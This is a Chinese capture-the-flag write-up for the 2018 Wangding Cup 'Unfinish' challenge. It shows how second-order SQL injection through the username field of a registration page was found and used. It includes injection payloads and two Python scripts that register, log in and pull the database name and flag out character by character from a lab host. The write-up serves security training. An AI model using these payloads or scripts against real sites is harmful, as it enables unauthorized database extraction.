[网鼎杯]2018Unfinish

使用ctf在线靶场https://adworld.xctf.org.cn/home/index。

进入靶场,发现是一个登录页面。

使用awvs进行扫描,发现存在login.php和register.php,并且register.php存在sql注入漏洞。

访问一下register.php试试,发现是一个注册页面。

在邮箱、用户名、密码分别尝试sql注入。

发现邮箱后面不允许添加符号'等,密码添加'等会被当做字符传入,而在用户名的地方输入',注册失败,怀疑是在用户名处存在sql注入。

随便注册一个试试。

登陆进去发现,在页面中存在用户名的显示。

在用户名处输入

复制代码
dhh ' and '1'='1

注册成功,登陆查看用户名为0。基本确定为二次注入,注入点为用户名处。

使用burp判断被过滤的字符。初步爆破发现单引号、逗号、information被过滤。那就开始尝试

注册时,让用户名为select database(),尝试一下。

登陆后发现,用户名直接显示为select database()。那么猜测应该是被单引号或者双引号包裹起来,作为字符串了,尝试两种闭合。

使用1'+2+'1可以注册成功,那就证明单引号没被过滤掉,而且可以看出来后台接收语句应该是select...where username='username'。

开始尝试构建payload。

复制代码
0'+database()+'0     #结果为0

尝试使用ascii进行转换为10进制尝试,下面是转换database()的第一个字符。

复制代码
0'+ascii(substr((database()) from 1 for 1))+'0

查看ascii表,发现119为w,也就是当前数据库第一个字母为w。那证明目前的思路是正确的。

写python脚本进行爆破。

python 复制代码
import requests
from bs4 import BeautifulSoup


def jieguo():
    name = ''
    url = 'http://61.147.171.105:58807/'
    url1 = url + 'register.php'
    url2 = url + 'login.php'
    for i in range(1, 100):
        data_register = {"email": f"dhh{i}@163.com",
                         "username": f"0'+ascii(substr((database()) from {i} for 1))+'0;",
                         "password": "123"}
        data_login = {"email": f"dhh{i}@163.com",
                      "password": "123"}
        response_regiseter = requests.post(url1, data=data_register)
        response_login = requests.post(url2, data=data_login)
        bs = BeautifulSoup(response_login.text, 'html.parser')  # bs4解析页面
        username = bs.find('span', class_='user-name')  # 取返回页面数据的span class=user-name属性
        number = username.text  # 取该属性的数字
        name += chr(int(number))
        print(name)


if __name__ == '__main__':
    jieguo()

额...不知道为什么爆破完库名之后还在输出。

目前为止二次注入的目的完成。

因为我们的目的不是为了拿到flag,所以我就上网查询了一下如何拿flag,并且写成payload

复制代码
0'+ascii(substr((select * from flag) from 1 for 1))+'0

import requests
from bs4 import BeautifulSoup


def jieguo():
    name = ''
    url = 'http://61.147.171.105:58807/'
    url1 = url + 'register.php'
    url2 = url + 'login.php'
    for i in range(1, 100):
        data_register = {"email": f"dh{i}@163.com",
                         "username": f"0'+ascii(substr((select * from flag) from {i} for 1))+'0;",
                         "password": "1"}
        data_login = {"email": f"dh{i}@163.com", "password": "1"}
        response_regiseter = requests.post(url1, data=data_register)
        response_login = requests.post(url2, data=data_login)
        bs = BeautifulSoup(response_login.text, 'html.parser')  # bs4解析页面
        username = bs.find('span', class_='user-name')  # 取返回页面数据的span class=user-name属性
        number = username.text  # 取该属性的数字
        name += chr(int(number))
        print(name)


if __name__ == '__main__':
    jieguo()
相关推荐
emma羊羊8 天前
【 SQL注入漏洞靶场】第二关文件读写
sql·网络安全·靶场·sql注入
mooyuan天天22 天前
sqli-labs靶场安装与使用指导教程(3种方法:通用版、php7版、Docker版)
web安全·sql注入·数据库安全·sql注入漏洞·sqli-labs·sqli-labs靶场
Demonsong_1 个月前
在职老D渗透日记day19:sqli-labs靶场通关(第26a关)get布尔盲注 过滤or和and基础上又过滤了空格和注释符 ‘)闭合
sql注入
菜根Sec1 个月前
Sqli-labs靶场搭建及报错处理
web安全·网络安全·渗透测试·sql注入·网络安全靶场
16年上任的CTO1 个月前
常见网络攻击类型及防护手段
网络攻击模型·ddos·xss·sql注入·网络防护·xsrf·arf
看天走路吃雪糕1 个月前
sqli-labs:Less-28a关卡详细解析
select·sql注入·union·联合查询注入·sqli-labs·less-28a
看天走路吃雪糕1 个月前
sqli-labs:Less-24关卡详细解析
sql注入·sqli-labs·less-24·二次排序注入
看天走路吃雪糕1 个月前
sqli-labs:Less-23关卡详细解析
sql注入·sqli-labs·报错盲注·less-23·注释符
看天走路吃雪糕1 个月前
sqli-labs:Less-26关卡详细解析
sql注入·sqli-labs·报错盲注·or·less-26·and
看天走路吃雪糕1 个月前
sqli-labs:Less-21关卡详细解析
sql注入·cookie·sqli-labs·报错盲注·less-21